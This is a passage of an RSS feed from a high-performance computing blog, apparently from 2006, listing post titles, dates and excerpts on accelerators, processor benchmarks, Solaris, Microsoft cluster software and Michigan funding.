      <pubDate>Mon, 09 Oct 2006 21:00:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/drinking-the-koolaid-by-the-megaliter/</guid>
      <description>We have been talking about application acceleration, and heterogenous computing for quite a while now. Call it HPC and you scare off anyone who might otherwise be interested in helping to build the future of computing. It really doesn&amp;rsquo;t matter what you call it at the end of the day. It is coming. Fast. Fine. Lets call it Accelerated Computing (AC for short). I have a reason for this.
Accelerated computing is not just for high performance computing.</description>
    </item>
    
    <item>
      <title>confluence</title>
      <link>https://blog.scalability.org/2006/10/confluence/</link>
      <pubDate>Mon, 09 Oct 2006 20:34:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/confluence/</guid>
      <description>Deepak over at the always enjoyable mndoci.com blog asked a great question. Its the question about the utility of any technology, and specifically he asked whether or not APUs and accelerators in general would be useful.
Around the same time, a BAA was released by the US Government requesting people start giving accelerated computing a serious look for their applications, though they didn&amp;rsquo;t indicate the applications explicitly, one could guess about this.</description>
    </item>
    
    <item>
      <title>When one paragraph says it all</title>
      <link>https://blog.scalability.org/2006/10/when-one-paragraph-says-it-all/</link>
      <pubDate>Mon, 09 Oct 2006 20:23:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/when-one-paragraph-says-it-all/</guid>
      <description>Today at HPCwire. They have a quote on the Tokyo Tech machine.
(my emphasis) I remember the VC&amp;rsquo;s asking me, &amp;ldquo;but how do you know this will even matter in HPC?&amp;rdquo; during our pitch. Now I can say, &amp;ldquo;Hindsight&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>apologies for the recent infrequent posting</title>
      <link>https://blog.scalability.org/2006/10/apologies-for-the-recent-infrequent-posting/</link>
      <pubDate>Fri, 06 Oct 2006 02:39:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/apologies-for-the-recent-infrequent-posting/</guid>
      <description>My time is a zero sum game. My day job kicked into serious overdrive in the last few weeks, and I simply haven&amp;rsquo;t had cycles to surface. Will try to force this over the weekend. Lots to write about. Like the accelerator market going into warp drive (pun intended), a really interesting BAA from the USG. And of course people who want and need things &amp;hellip; all of these do a really good job of driving &amp;ldquo;free&amp;rdquo; time down to 0.</description>
    </item>
    
    <item>
      <title>Slightly OT</title>
      <link>https://blog.scalability.org/2006/09/slightly-ot/</link>
      <pubDate>Fri, 29 Sep 2006 06:50:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/slightly-ot/</guid>
      <description>Given the discussions on this and other web sites by biased partisans (myself included), I thought this headline (SMB Linux use on the rise) and article was interesting.
The major thesis is interesting, but the data contained within is startling. First, they note that Linux isn&amp;rsquo;t the selling point. Something we have pointed out here before, the OS is not the issue. Its the applications. It is always the applications. People claiming that the issue is the installation of the OS are missing the boat.</description>
    </item>
    
    <item>
      <title>Generating an &#34;optimal&#34; circuit from a language construct</title>
      <link>https://blog.scalability.org/2006/09/generating-an-optimal-circuit-from-a-language-construct/</link>
      <pubDate>Sat, 23 Sep 2006 05:40:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/generating-an-optimal-circuit-from-a-language-construct/</guid>
      <description>We use high level languages to provide an abstraction against the hardware, OS, system services we want to use. The compiler is responsible for this mapping. So when I write a simple loop
for(i=1;i&amp;lt;N;i++) { a[i] = b[i] +c[i]; }  or for you Fortran types out there
do i=0,N-1 a(i)=b(i)+c(i) enddo  The compiler will turn that into an assembly language loop, which loads an iteration counter (i) into a register, either load registers with a[i], b[i], and c[i], or do memory operations to load compute and then save.</description>
    </item>
    
    <item>
      <title>For a market that some claim does not exist, this is attracting lots of attention and product ...</title>
      <link>https://blog.scalability.org/2006/09/for-a-market-that-some-claim-does-not-exist-this-is-attracting-lots-of-attention-and-product/</link>
      <pubDate>Wed, 20 Sep 2006 19:33:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/for-a-market-that-some-claim-does-not-exist-this-is-attracting-lots-of-attention-and-product/</guid>
      <description>Interesting. Just like we predicted several years ago.
The winners in any APU contest will be the ones that can leverage economies of scale. At a few hundred dollars per unit, the Cell is likely to dominate due to the PS3 volume anticipated. The ATI, and if nVidia comes out with Quadro Plex in time, systems will also be quite relevant. Several thousand dollars per APU (ala current Virtex 4/Altera pricing) is a non-starter.</description>
    </item>
    
    <item>
      <title>To abstract or not to abstract: that is the question ...</title>
      <link>https://blog.scalability.org/2006/09/to-abstract-or-not-to-abstract-that-is-the-question/</link>
      <pubDate>Wed, 20 Sep 2006 15:44:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/to-abstract-or-not-to-abstract-that-is-the-question/</guid>
      <description>&amp;hellip; Whether &amp;lsquo;tis nobler in the developers mind to suffer The slings and arrows of outrageous application performance, Or to take arms against a sea of development troubles And by abstraction end them? &amp;ndash; &amp;ldquo;Bill S&amp;rdquo; on whether or not to use higher level abstractions when programming for performance.
Ok, &amp;ldquo;Bill&amp;rdquo; didn&amp;rsquo;t really write that, his text was paraphrased and adapted. I am also pretty sure he wasn&amp;rsquo;t writing parallel code (parallel prose maybe).</description>
    </item>
    
    <item>
      <title>The market for accelerators and APUs</title>
      <link>https://blog.scalability.org/2006/09/the-market-for-accelerators-and-apus/</link>
      <pubDate>Wed, 20 Sep 2006 03:32:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/the-market-for-accelerators-and-apus/</guid>
      <description>The PeakStream news, raising $17M in a B round was wonderful to hear about. I am happy for them, and wish them success. Recently I read that Linux Networx raised money as well. LNXI is also an interesting company. Maybe this is the harbinger of good things to come.
I don&amp;rsquo;t know. In either case, PeakStream&amp;rsquo;s product has some limitations as an accelerator, due to the single precision focus. Linux Networx also announced its own accelerators recently, though I don&amp;rsquo;t know how much has been released publically at this point about them, or if customers have them and have reactions yet.</description>
    </item>
    
    <item>
      <title>APU programming made easy?</title>
      <link>https://blog.scalability.org/2006/09/apu-programming-made-easy/</link>
      <pubDate>Tue, 19 Sep 2006 06:19:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/apu-programming-made-easy/</guid>
      <description>The folks over at Peakstream have some interesting ideas. Very similar to what we have been talking about and pitching for the past 4 years.
One difference is that they have just closed a series B round, and we can&amp;rsquo;t seem to find any interest. It&amp;rsquo;s the location. Ok, on to the concept. Abstract the complexity. Make the programming simpler. Make it easy to integrate. Make it seamless. Remove restrictions. Sounds good, right?</description>
    </item>
    
    <item>
      <title>Breaking mirror symmetry in HPC</title>
      <link>https://blog.scalability.org/2006/09/breaking-mirror-symmetry-in-hpc/</link>
      <pubDate>Fri, 15 Sep 2006 05:34:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/breaking-mirror-symmetry-in-hpc/</guid>
      <description>If you are not already reading HPCWire on a regular basis, I do recommend it as one of the &amp;ldquo;must&amp;rdquo; weekly aggregation sites. They have an interesting article on the &amp;ldquo;coming&amp;rdquo; heterogeneous computing systems. Neat idea, but heterogeneous supercomputing systems are already here. Have been for a while. In massive numbers. Working on specialized HPC problems. More about this in a moment.
HPC has a concept built into it. Symmetric multiprocessing, or SMP systems.</description>
    </item>
    
    <item>
      <title>Is there a need for supercomputing?</title>
      <link>https://blog.scalability.org/2006/09/is-there-a-need-for-supercomputing/</link>
      <pubDate>Fri, 08 Sep 2006 04:33:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/is-there-a-need-for-supercomputing/</guid>
      <description>Why not ask the Council on Competitiveness.
Or the businesses that have grown dependent upon simulation? Well, not all of them are doing well. Ford&amp;rsquo;s troubles are fairly well known, but this is not a supercomputing issue, it is a business conditions issue. Dreamworks and Boeing aren&amp;rsquo;t in trouble, they are doing well. As are many of the others who attended this meeting. All of them appear to indicate that they need more computing power and more software that can take advantage of this power.</description>
    </item>
    
    <item>
      <title>APUs in the news</title>
      <link>https://blog.scalability.org/2006/09/apus-in-the-news/</link>
      <pubDate>Thu, 07 Sep 2006 00:43:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/apus-in-the-news/</guid>
      <description>Referencing this article. When we talked to a few VC&amp;rsquo;s previously about APUs, we were asked to show that there would be demand. Kind of hard to do so in advance of the market, but we made rough estimates. Earlier this year, ClearSpeed took its reference design board and started selling it. Sure enough people bought it. Because it does a number of things quite well. At a lower power consumption.</description>
    </item>
    
    <item>
      <title>A teraflop here, a teraflop there, and pretty soon you are talking about real computing power</title>
      <link>https://blog.scalability.org/2006/09/a-teraflop-here-a-teraflop-there-and-pretty-soon-you-are-talking-about-real-computing-power/</link>
      <pubDate>Thu, 07 Sep 2006 00:22:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/a-teraflop-here-a-teraflop-there-and-pretty-soon-you-are-talking-about-real-computing-power/</guid>
      <description>It seems IBM will be building another new NNSA machine. So whats interesting about this, other than IBM getting good press? Well this appears to be part of a growing wave of heterogenous high performance computing systems. Roadrunner appears to be a mix of COTS Opteron hardware, and Cell based blades as Accelerator Processing Units (APUs).
Why is that interesting? Programming parallel systems is hard. Programming heterogenous parallel systems is &amp;hellip; interesting.</description>
    </item>
    
    <item>
      <title>End of an era or architecture ...</title>
      <link>https://blog.scalability.org/2006/09/end-of-an-era-or-architecture/</link>
      <pubDate>Wed, 06 Sep 2006 20:59:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/end-of-an-era-or-architecture/</guid>
      <description>SGI is standing down Irix and MIPS architectures. Likely one of the harder decisions they have had to make, these would not have been selling much as of late. MIPS was hopelessly long in the tooth, and Irix, while one of the better Unixen out there (IMO), was closely tied to MIPS. In the end Irix could not keep and continue to attract applications. When this happens enough, your platform becomes less desireable.</description>
    </item>
    
    <item>
      <title>The best API for parallel programming is ...</title>
      <link>https://blog.scalability.org/2006/08/the-best-api-for-parallel-programming-is/</link>
      <pubDate>Thu, 31 Aug 2006 20:39:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/the-best-api-for-parallel-programming-is/</guid>
      <description>Loaded question. OpenMP may be the simplest to work with. MPI is not. The differences are that OpenMP is integrated as a set of compiler hints and is restricted to shared memory machines. MPI are explicit calls to user level communication routines, that handle data motion for you, you simply point at what to move.
While I wish it were that simple in terms of the differences, there are other major ones.</description>
    </item>
    
    <item>
      <title>Finale: Michigan&#39;s 21st century fund</title>
      <link>https://blog.scalability.org/2006/08/finale-michigans-21st-century-fund/</link>
      <pubDate>Thu, 31 Aug 2006 14:34:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/finale-michigans-21st-century-fund/</guid>
      <description>I have updated a post from a while ago. Call this a rant, a vent, whatever. I am saddened that we wasted so much time on this process. This is not a mistake that will be repeated. I like to tell people that if you design something to fail, often that is exactly what happens. Back to business. Update: 4-Sept-2006 We aren&amp;rsquo;t the only folks to notice that something is not quite right.</description>
    </item>
    
    <item>
      <title>Thou dost protesteth too much, methinks ...</title>
      <link>https://blog.scalability.org/2006/08/thou-dost-protesteth-too-much-methinks/</link>
      <pubDate>Wed, 30 Aug 2006 14:28:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/thou-dost-protesteth-too-much-methinks/</guid>
      <description>I read an amusing article linked to by the fine folks over at slashdot. In the Infoworld article that slashdot points to the title sets the tone. It is entitled &amp;ldquo;Linux will get buried&amp;rdquo;. I am going to look at this from an HPC viewpoint.
Apple is, and will remain for the forseeable future, a hardware company. All the software that it does, it does for no other reason than to sell hardware.</description>
    </item>
    
    <item>
      <title>On interoperable and portable environments</title>
      <link>https://blog.scalability.org/2006/08/on-interoperable-and-portable-environments/</link>
      <pubDate>Tue, 29 Aug 2006 00:18:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/on-interoperable-and-portable-environments/</guid>
      <description>or, as Chris over at hpcanswers.org asks, Why did Microsoft release C#? And what has this got to do with HPC? Quite a bit. Call it an opportunity that is currently in the state of being missed by the maker of C#. More about that in a moment.
Chris postulates
Possibly, though I think it is a bit more complex than that. Basically my take on things is that the whole Java fiasco hurt Microsoft &amp;hellip; not technologically, not in a market sense.</description>
    </item>
    
    <item>
      <title>On bottlenecks</title>
      <link>https://blog.scalability.org/2006/08/on-bottlenecks/</link>
      <pubDate>Mon, 28 Aug 2006 05:32:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/on-bottlenecks/</guid>
      <description>At BiO Jeff linked to a story from earlier this year on where the bottlenecks really are in computing. The article he linked to was posted in the American Scientist online magazine.
The major thesis of the article is that performance is not the only, or as the title implies, real bottleneck, in scientific computing. I might suggest reading the article if you get the chance. I don&amp;rsquo;t agree with their major thesis implied in the title.</description>
    </item>
    
    <item>
      <title>Invariant under change of notation</title>
      <link>https://blog.scalability.org/2006/08/invariant-under-change-of-notation/</link>
      <pubDate>Thu, 24 Aug 2006 02:40:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/invariant-under-change-of-notation/</guid>
      <description>This was the &amp;ldquo;joke&amp;rdquo; about tensors that one of my graduate school professors told us when we were trying to grok a sudden notational shift. Took some hard thinking, and then we sorta got it. Well enough to work out a problem. Hopefully to be useful in later life.
Well, 17 years (wow&amp;hellip;. that long?) later, I am writing some quick code to transform a data set extracted in XML into another data set.</description>
    </item>
    
    <item>
      <title>An amalgam of recent conversations</title>
      <link>https://blog.scalability.org/2006/08/an-amalgam-of-recent-conversations/</link>
      <pubDate>Fri, 18 Aug 2006 14:40:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/an-amalgam-of-recent-conversations/</guid>
      <description>This would normally be OT with respect to HPC, if not for Microsoft starting to compete with one of the fastest growing and sustaining markets.
Rather than report all the conversations we have had, I am going to synthesize them into an effective &amp;ldquo;single&amp;rdquo; conversation. This has happened about 5 times this week, online, in person, visiting customers, and so forth. Them: &amp;ldquo;We need low cost and highly secure methods of accessing our cluster resources.</description>
    </item>
    
    <item>
      <title>Is OpenSolaris Open?</title>
      <link>https://blog.scalability.org/2006/08/is-opensolaris-open/</link>
      <pubDate>Thu, 17 Aug 2006 20:03:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/is-opensolaris-open/</guid>
      <description>As seen on /. IBM is questioning whether or not it is really open.
I think the real question is, does it matter? I really don&amp;rsquo;t see a need for it. The market is positively crowded with OpenSouce Linux, *BSD. OpenSource should not be a repository for declining projects. From an ISV perspective, you have to ask &amp;ldquo;why&amp;rdquo;? Precisely what benefit in terms of lower costs and increased revenue does being on Solaris bring?</description>
    </item>
    
    <item>
      <title>Graphics benchmarking</title>
      <link>https://blog.scalability.org/2006/08/graphics-benchmarking/</link>
      <pubDate>Wed, 16 Aug 2006 17:34:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/graphics-benchmarking/</guid>
      <description>A friend who runs a very cool display company (true 3D volumetric displays, not spinning things), asked me to do a quick benchmark for him. As I was freshly done with some other GLperf stuff, I agreed. FWIW getting GLperf to compile on late model Linux is &amp;hellip; well&amp;hellip; interesting. Especially the 64bit versions. Lots of hardwired bits in the build. Annoying.
His test was fairly simple, but it hit the critical points he needed to hit.</description>
    </item>
    
    <item>
      <title>4 on the floor (or in the socket)</title>
      <link>https://blog.scalability.org/2006/08/4-on-the-floor-or-in-the-socket/</link>
      <pubDate>Wed, 16 Aug 2006 00:59:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/4-on-the-floor-or-in-the-socket/</guid>
      <description>(aka the QUADs are coming, the QUADs are coming)
I was worried about memory bandwidth in the dual core time frame. Turned out to not be a problem for most codes. I will need to see more on the AM3. Punch line is that AM3 is socket compatible with AM2. Wow. Will it have enough bandwidth for 4 cores in a single unit? We are going to need to start talking about bandwidth per socket.</description>
    </item>
    
    <item>
      <title>New programming workshop:  Perl and R for Informatics</title>
      <link>https://blog.scalability.org/2006/08/new-programming-workshop-perl-and-r-for-informatics/</link>
      <pubDate>Tue, 15 Aug 2006 19:22:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/new-programming-workshop-perl-and-r-for-informatics/</guid>
      <description>The good folks over at BioInformatics.org have a new workshop ready to go on programming in [Perl and R. See this link for more details. If there is interest in having this outside of Boston, please let me know.</description>
    </item>
    
    <item>
      <title>Woodcrest impressions</title>
      <link>https://blog.scalability.org/2006/08/woodcrest-impressions/</link>
      <pubDate>Tue, 15 Aug 2006 15:11:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/woodcrest-impressions/</guid>
      <description>Ok, its about 2 weeks into the woodcrest experiment. I am starting to form opinions about woodcrest, where it is good, where it is hohum. First off, woodcrest appears to give really good artificial benchmark. In some cases.
Artificial benchmarks are those which are not programs that people run every day with everyday work loads. Synthetic benchmarks are more of the &amp;ldquo;hundred kernels&amp;rdquo; variety. Both artificial and synthetic benchmarks have their place.</description>
    </item>
    
    <item>
      <title>&#34;Blogmarketing&#34;</title>
      <link>https://blog.scalability.org/2006/08/blogmarketing/</link>
      <pubDate>Tue, 15 Aug 2006 14:56:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/blogmarketing/</guid>
      <description>I have noticed a propensity for corporate &amp;ldquo;bloggers&amp;rdquo; to somehow turn discussions around to the point where they can do a product placement, or somehow hype their own stuff. Think of things like &amp;ldquo;so the Yankees will win the series, and this is why our product X is the best&amp;rdquo;. I kid you not.
Blogging is, or can be, an expression of self. Not arguing for philosophical purity or anything like that.</description>
    </item>
    
    <item>
      <title>Notes about this blog</title>
      <link>https://blog.scalability.org/2006/08/notes-about-this-blog/</link>
      <pubDate>Thu, 03 Aug 2006 17:37:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/notes-about-this-blog/</guid>
      <description>Some readers may misunderstand this blog. Blogs in general are places to get thoughts down, in a public forum, and invite discussion. Sort of an open-source idea site. Download an opinion and fork it if you like, ignore it if you wish.
It is a reflection of each person, how they view the world, and how they think, and their approach to life that filters into this stuff. Elements of personality are in there.</description>
    </item>
    
    <item>
      <title>Accelerator Processor Units (APUs) for non-scientific applications</title>
      <link>https://blog.scalability.org/2006/08/accelerator-processor-units-apus-for-non-scientific-applications/</link>
      <pubDate>Thu, 03 Aug 2006 16:15:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/accelerator-processor-units-apus-for-non-scientific-applications/</guid>
      <description>I have been talking with a person about using FPGAs to accelerate non-scientific applications, business applications recently.
The idea is fundamentally interesting. HPC is not the only thing that needs acceleration. My question is this: Where are the critical pain points, what processing takes a great deal of time that people would be willing to spend, I dunno, $10,000 US to make go faster? I am using $10,000 US as a rough guess.</description>
    </item>
    
    <item>
      <title>SGI updates</title>
      <link>https://blog.scalability.org/2006/08/sgi-updates/</link>
      <pubDate>Thu, 03 Aug 2006 16:01:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/sgi-updates/</guid>
      <description>I haven&amp;rsquo;t said anything about SGI recently, been too busy with other things. This is good, but much has been happening in SGI land.
First, I had wondered whether or not SGI stake holders would get anything out of the company &amp;hellip; that is, whether or not it would survive the bankruptcy proceedings. It does appear to be navigating those waters well, but it is worth noting a few things in case you haven&amp;rsquo;t followed the story.</description>
    </item>
    
    <item>
      <title>When I calls them, I really calls them ...</title>
      <link>https://blog.scalability.org/2006/08/when-i-calls-them-i-really-calls-them/</link>
      <pubDate>Wed, 02 Aug 2006 18:08:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/when-i-calls-them-i-really-calls-them/</guid>
      <description>See this bit of propaganda and the money quotes on Linux within
Let me get this straight &amp;hellip; I want to make sure I understand this &amp;hellip; You really want your expensive HPC computing resource/platform setup by someone who doesn&amp;rsquo;t know HPC? Sort of like you wanting that expensive database server set up by a windows technician with no knowledge of databases? Or that nice web server set up by someone with no knowledge of web servers.</description>
    </item>
    
    <item>
      <title>Woodcrest part 3</title>
      <link>https://blog.scalability.org/2006/08/woodcrest-part-3/</link>
      <pubDate>Wed, 02 Aug 2006 03:27:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/woodcrest-part-3/</guid>
      <description>Just when I thought I understood things &amp;hellip; Ran the original test case that we ran previously, but with the rebuilt GAMESS with a modern compiler.
Ran one on the 2.66 GHz Woodcrest, one on the 2.2 GHz Opteron. Both are dual core, I don&amp;rsquo;t have a 2.4 or 2.6 GHz dual core set of Opterons to put into a machine. Used 4 way parallel on shared memory machine. Woodcrest has a 2x cache size advantage, has a 30% faster memory system, and about a 20% clock speed advantage.</description>
    </item>
    
    <item>
      <title>Woodcrest part 2</title>
      <link>https://blog.scalability.org/2006/08/woodcrest-part-2/</link>
      <pubDate>Tue, 01 Aug 2006 20:57:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/woodcrest-part-2/</guid>
      <description>So by now you know I ran an old binary and an old test on the Woodcrest and Opteron. I wasn&amp;rsquo;t impressed with the results, the hype was out of proportion with the reality. Lets assume that Intel suggests we recompile our code. I pulled down a new GAMESS (the 2-2006 variant), built it with the PGI compiler, though I had to do some option tweaking, it was otherwise OK, and ran it.</description>
    </item>
    
    <item>
      <title>We&#39;ve got a Woodcrest ...</title>
      <link>https://blog.scalability.org/2006/07/weve-got-a-woodcrest/</link>
      <pubDate>Mon, 31 Jul 2006 20:09:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/weve-got-a-woodcrest/</guid>
      <description>for testing/development and other purposes. Config is reasonable, with an upgrade later today. 2 x 2.66 GHz (5130) processors, 4 GB ram, nice video card (Quadro FX/4500).
Installed SuSE 10.1 with updates/patches. My expectations were that this machine would positively blow the doors off of a similarly clocked Opteron (252). Given the massive hype around Woodcrest, this is what one might expect. If you are going to hype like mad, you need to be able to deliver on the hype.</description>
    </item>
    
    <item>
      <title>How to lose a market without really trying</title>
      <link>https://blog.scalability.org/2006/07/how-to-lose-a-market-without-really-trying/</link>
      <pubDate>Thu, 27 Jul 2006 15:49:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/how-to-lose-a-market-without-really-trying/</guid>
      <description>We are working on some benchmarks for a customer. This is a commercial code, closed source, MPI based.
Cluster in question is an Infinipath based system. I cannot say enough good things about the HTX based Infinipath systems, they are very fast, very low latency. And they come with an MPI stack. Ok, let me give you a hint where this is going. The benchmark could not run, as the code could not run on the nice super fancy Infinipath system.</description>
    </item>
    
    <item>
      <title>21st Century postmortem</title>
      <link>https://blog.scalability.org/2006/07/21st-century-postmortem/</link>
      <pubDate>Thu, 20 Jul 2006 15:12:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/21st-century-postmortem/</guid>
      <description>About a week has passed, and a friend said something quite interesting about this. Michigan has decided not to invest in Michigan&amp;rsquo;s future. Amusing.
The commercialization areas that we submitted for were to be scored on Scientific and Technical basis, Personnel, Commercialization Merit, an fund leverage. The first sentance of the review sets the tone. &amp;ldquo;The technical merit of this proposal could be phenomenal, but there is a lack of explanation of the important underlying science.</description>
    </item>
    
    <item>
      <title>21st Century update</title>
      <link>https://blog.scalability.org/2006/07/21st-century-update/</link>
      <pubDate>Thu, 13 Jul 2006 19:14:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/21st-century-update/</guid>
      <description>Results are in and we did not advance. Good luck to the advancers. Update: Looking over the results, not a single advanced computing project was advanced. HPC was completely ignored which runs counter to what they said they would do. Lots of automotive bits were advanced. The message for a small HPC company located in Michigan is sadly getting clearer.</description>
    </item>
    
    <item>
      <title>21st Century (non)update</title>
      <link>https://blog.scalability.org/2006/07/21st-century-nonupdate/</link>
      <pubDate>Thu, 13 Jul 2006 16:57:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/21st-century-nonupdate/</guid>
      <description>We have been patiently waiting to hear whether or not we advanced to the next round. We already know the fate of one proposal which we helped on, but was not one of our own submissions. That was discarded on a technicality, basically an index entry reporting on confidential material and color pages was not pointing to the right pages according to the report back from the compliance tester. Not screened for content, as it did not pass screening for format.</description>
    </item>
    
    <item>
      <title>Thoughts on Solaris 10</title>
      <link>https://blog.scalability.org/2006/07/thoughts-on-solaris-10/</link>
      <pubDate>Tue, 11 Jul 2006 23:04:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/thoughts-on-solaris-10/</guid>
      <description>I have opined here that I do not believe that Solaris will overtake Linux&amp;rsquo;s lead in HPC clusters. This does not mean that I don&amp;rsquo;t think it can have a role.
Basically, imagine you have to deliver a service. Something like Google. The end user of Google doesn&amp;rsquo;t care what OS the underlying software runs on. They care about their usage. Same with the end user of Yahoo, Slashdot, Digg, &amp;hellip; .</description>
    </item>
    
    <item>
      <title>Apologies</title>
      <link>https://blog.scalability.org/2006/07/apologies/</link>
      <pubDate>Tue, 11 Jul 2006 22:35:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/apologies/</guid>
      <description>Folks, we are getting spammed. If something gets through, please note that I want to apologise in advance and I will handle it as soon as possible. If I miss something, fire me a note.</description>
    </item>
    
    <item>
      <title>Test drive of the 6/06 Solaris 10 part 2, usage</title>
      <link>https://blog.scalability.org/2006/07/test-drive-of-the-606-solaris-10-part-2-usage/</link>
      <pubDate>Sat, 08 Jul 2006 23:02:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/test-drive-of-the-606-solaris-10-part-2-usage/</guid>
      <description>The machine is up. If you don&amp;rsquo;t know about Blastwave, it is a helpful resource. Once you set up your machine, mozy over there, and get all the tools you would otherwise be missing.
nVidia graphics, pulled down the Solaris nVidia binary, installed it, rebooted and up it came. nVidia makes great chips and great drivers. We are lucky they are still supporting Solaris. We have an Itanium2 linux box here where the nVidia drivers are built for the old XFree86 versus xorg used in Centos 4.</description>
    </item>
    
    <item>
      <title>Test drive of the 6/06 Solaris 10 part 1, installation</title>
      <link>https://blog.scalability.org/2006/07/test-drive-of-the-606-solaris-10-part-1-installation/</link>
      <pubDate>Fri, 07 Jul 2006 21:13:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/test-drive-of-the-606-solaris-10-part-1-installation/</guid>
      <description>My experience with the 1/06 Solaris 10 was, well, less than good. I came away with the impression of a system that is very hard to install, one might say extraordinarily hard to install, with few supported systems. Video didn&amp;rsquo;t work, networking required going to an unsupported freeware site, pulling down a binary driver, and doing something akin to insmod in linux.
I was simply not impressed with the installation. It was horrible.</description>
    </item>
    
    <item>
      <title>followup to another conversation</title>
      <link>https://blog.scalability.org/2006/07/followup-to-another-conversation/</link>
      <pubDate>Fri, 07 Jul 2006 19:51:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/followup-to-another-conversation/</guid>
      <description>For reasons I don&amp;rsquo;t quite understand WP seems to have eaten Dan&amp;rsquo;s post.?? Here it is, re-replicated: Looks like we both have trouble being succinct! Thanks for the Linux lessons.?? I&amp;rsquo;ve worked in both Windows and UNIX environments professionally, but I&amp;rsquo;ve never done any real work with Linux.?? I appreciate learning more, and your information is helpful. There&amp;rsquo;s no doubt that you are 100% correct about one thing:?? the market will decide.</description>
    </item>
    
    <item>
      <title>And now for something completely different ...</title>
      <link>https://blog.scalability.org/2006/06/and-now-for-something-completely-different/</link>
      <pubDate>Fri, 23 Jun 2006 20:56:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/and-now-for-something-completely-different/</guid>
      <description>Well, I wanted to get back to our core for a bit.
The Michigan Growth Capital Symposium has been done for a month. My great fear in presenting there was that I wouldn&amp;rsquo;t be speaking to money people, but would in fact be speaking to business consultants, advisors, CEO/CFO/etc for hire. Sadly, most of my audience appeared to be that. Some were PR folks, some were nice to speak with, some were, well &amp;hellip; A few VCs and fewer money people.</description>
    </item>
    
    <item>
      <title>More about the tactics: commoditized HPC coming from an MCSE/Best Buy near you</title>
      <link>https://blog.scalability.org/2006/06/more-about-the-tactics-commoditized-hpc-coming-from-an-mcsebest-buy-near-you/</link>
      <pubDate>Fri, 23 Jun 2006 19:55:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/more-about-the-tactics-commoditized-hpc-coming-from-an-mcsebest-buy-near-you/</guid>
      <description>Microsoft is pushing its resellers to enter this market.
From here
Uh huh. Remember those paper MCSEs? Clusters are far more complex to get right than a basic PC network. Diagnosing and solving performance problems on tightly coupled machines is non-trivial. This is going to be &amp;hellip; interesting.</description>
    </item>
    
    <item>
      <title>Tactics versus strategy for the HPC market</title>
      <link>https://blog.scalability.org/2006/06/tactics-versus-strategy-for-the-hpc-market/</link>
      <pubDate>Fri, 23 Jun 2006 02:47:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/tactics-versus-strategy-for-the-hpc-market/</guid>
      <description>I have given the Microsoft entry into cluster computing a great deal of thought. I want to see if this is a force to be reckoned with, or something else. Will they matter in the long term?
A tactic is something you execute to further a long term goal. You may change tactics to achieve your goals. You may alter your tactical foci to adjust to market conditions. Individual tactics are not the important element, how they advance you towards your goals are.</description>
    </item>
    
    <item>
      <title>How the Microsoft WCC could be good or bad</title>
      <link>https://blog.scalability.org/2006/06/how-the-microsoft-wcc-could-be-good-or-bad/</link>
      <pubDate>Mon, 12 Jun 2006 04:21:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/how-the-microsoft-wcc-could-be-good-or-bad/</guid>
      <description>While thinking this through, there are a number of serious issues with WCC I can spot. I won&amp;rsquo;t go through them here, I want to mull over them for a while.
MPI. Supporting a new interconnect is hard. You have to relink your application. This is true on all platforms. Some such as the Scali system attempt to make this easy by separating layers, and allowing you to compile your app and select the fabric at runtime.</description>
    </item>
    
    <item>
      <title>One of those --YARGH!!!-- moments ...</title>
      <link>https://blog.scalability.org/2006/06/one-of-those-yargh-moments/</link>
      <pubDate>Fri, 09 Jun 2006 17:01:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/one-of-those-yargh-moments/</guid>
